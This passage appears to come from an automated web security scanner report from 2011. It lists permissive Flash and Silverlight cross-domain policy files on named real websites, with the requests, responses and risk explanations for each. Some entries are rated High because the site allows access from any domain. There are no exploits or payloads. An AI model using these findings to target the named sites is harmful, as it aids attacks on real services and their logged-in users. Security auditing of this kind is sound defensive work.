Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fansonly.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:17 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT
Accept-Ranges: bytes
Content-Length: 909
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.fansonly.com" />
<allow-access-from domain="*.initinteractive.com" />
<allow-access-from domain="174.132.109.106" />
<allow-access-from domain="*.cstv.com" />
<allow-access-from domain="*.ocsn.com" />
<allow-access-from domain="*.collegesports.com" />
<allow-access-from domain="livestats.*.fansonly.com" />
<allow-access-from domain="livestats.*.cstv.com" />
<allow-access-from domain="livestats.*.collegesports.com" />
<allow-access-from domain="*.rolltide.com" />
<allow-access-from domain="*.ucirvinesports.com" />
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="flv.sales.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mediapm.edgesuite.net" secure="false" />
...[SNIP]...

6.111. http://www.foxsportssouthwest.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportssouthwest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foxsportssouthwest.com

Response

HTTP/1.0 200 OK
Server: nginx/1.0.3
Content-Type: application/xml
Last-Modified: Mon, 08 Nov 2010 18:43:43 GMT
ETag: "1f2f8aa-d9-4948f00e3b5c0"
Accept-Ranges: bytes
Content-Length: 217
Date: Sun, 04 Sep 2011 01:26:09 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.edgecastcdn.net" />
<allow-access-from domain="*.brandaffinity.net" />
<allow-access-from domain="*.netbat.com" />
</cro
...[SNIP]...

6.112. http://www.latimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.latimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.latimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 438
Content-Type: text/xml
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Last-Modified: Thu, 03 Mar 2011 02:18:58 GMT
ETag: "1b6-4d6efa92"
Accept-Ranges: bytes
Date: Sun, 04 Sep 2011 01:26:15 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.wp.com"/>
<allow-access-from domain="s-ssl.wordpress.com"/>
<allow-access-from domain="latimesphoto.wordpress.com"/>
<allow-access-from domain="framework.latimes.com"/>
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...

6.113. http://www.myspace.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myspace.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Expires: -1
Last-Modified: Thu, 01 Sep 2011 03:28:02 GMT
Accept-Ranges: bytes
ETag: "0d70275768cc1:0"
Server: Microsoft-IIS/7.5
X-Server: 979f881f10211383746f03754b03c7d9bbf75b93f28b477f
X-PoweredBy: Chunk from Goonies
Date: Sun, 04 Sep 2011 01:26:20 GMT
Connection: keep-alive
Content-Length: 680
X-Vertical: profileidentities

<cross-domain-policy>
   <allow-access-from domain="*.fimservecdn.com" />
   <allow-access-from domain="lads.myspace.cn" />
   <allow-access-from domain="*.ilike.com" />
   <allow-http-request-headers-fro
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" />
   <allow-access-from domain="*.myspace.com" />
...[SNIP]...

6.114. http://www.reuters.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:42 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 00:49:42 GMT
browser-expires: Sun, 4 Sep 2011 00:44:42 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 857
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.reutersmedia.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.uk.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="feedroom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oho.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.metacarta.com" secure="false"/>
...[SNIP]...

6.115. http://www.sacbee.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 15 Aug 2011 23:32:59 GMT
ETag: "a12c7f-175-4e49acab"
Server: Apache/1.3.41
Content-Type: application/xml
Cache-Control: max-age=175
Date: Sun, 04 Sep 2011 00:57:44 GMT
Content-Length: 373
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
   "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sacbee.com"/>
   <allow-access-from domain="*.mcclatchyinteractive.com"/>
   <allow-access-from domain="*.vmixcore.com"/>
...[SNIP]...

6.116. http://www.sologig.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sologig.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sologig.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 19:43:17 GMT
Accept-Ranges: bytes
ETag: "d89fcdff5c16cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL39
Date: Sun, 04 Sep 2011 01:27:38 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...

6.117. http://www.stumbleupon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:10:01 GMT
Content-Type: application/xml
Content-Length: 460
Date: Sun, 04 Sep 2011 01:27:58 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...

6.118. http://www.tsn.ca/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tsn.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tsn.ca

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Type: text/xml
Last-Modified: Tue, 16 Aug 2011 18:52:44 GMT
Accept-Ranges: bytes
ETag: "f5ca3faf455ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:28 GMT
Connection: close
Content-Length: 820

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="watch.tsn.ca" />
<allow-access-from domain="watch.ctv.ca" />
<allow-access-from domain="*.tsn.ca" />
       <allow-access-from domain="tsn.ca" />
<allow-access-from domain="*.ctvdigital.com" />
<allow-access-from domain="*.ctvdigital.ca" />
<allow-access-from domain="images.tsn.ca.edgesuite.net" />
<allow-access-from domain="*.mtv.ca" />
<allow-access-from domain="*.edgefcs.net" />
       <allow-access-from domain="ads.itravel2000.com"/>
       <allow-access-from domain="*.curltv.com"/>
<allow-access-from domain="*.daelgren.com"/>
    <allow-access-from domain="*.streamtheworld.com"/>
...[SNIP]...

6.119. http://www.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:43 GMT
Accept-Ranges: bytes
ETag: "59d64d1117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:32 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.120. http://www.wtp101.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:12:32 GMT
ETag: 1300113893320
LastModified: Mon, 14 Mar 2011 14:44:53 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 320
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.adap.tv"/>
<allow-access-from domain="*.nieuwefabia.nl"/>
<allow-access-from domain="*.denieuwefabia.nl"/>
...[SNIP]...

6.121. http://www.youtube.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Sun, 04 Sep 2011 01:28:37 GMT
Expires: Sun, 04 Sep 2011 01:28:37 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.122. http://admin6.testandtarget.omniture.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin6.testandtarget.omniture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin6.testandtarget.omniture.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:21:50 GMT
Accept-Ranges: bytes
ETag: W/"313-1313024241000"
Connection: close
Set-Cookie: X-Mapping-obodhgke=C65CAE406CB199739E142186AC7C21A1; path=/
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 313

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s7sps1.scene7.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="s7sps5.scene7.com"/>
...[SNIP]...

6.123. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:23 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 01:19:23 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.124. https://docs.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Sun, 04 Sep 2011 19:29:21 GMT
Date: Sat, 03 Sep 2011 19:29:21 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 21186

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.125. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-rbc.bidder7.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 27 Aug 2011 03:06:09 GMT
ETag: "3cd8207-116-4ab73f18d4a40"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="zaptrader.themig.com" />
...[SNIP]...

6.126. http://twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:53 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 01:54:53 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.127. http://www.traffic.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traffic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.traffic.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b mod_jk/1.2.25
Last-Modified: Wed, 22 Apr 2009 22:26:16 GMT
ETag: "a4b03-9d-4682c40737200"
Accept-Ranges: bytes
Content-Length: 157
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.wfaa.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.wfaa.com" />
</cross-domain-policy>

7. Silverlight cross-domain policy
There are 13 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sun, 04 Sep 2011 01:21:13 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:42:17 GMT
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.3. http://content.usatoday.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT
Accept-Ranges: bytes
ETag: "80964c5f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:14 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

7.4. http://metrics.sprint.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:11 GMT
Server: Omniture DC/2.0.0
xserver: www614
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

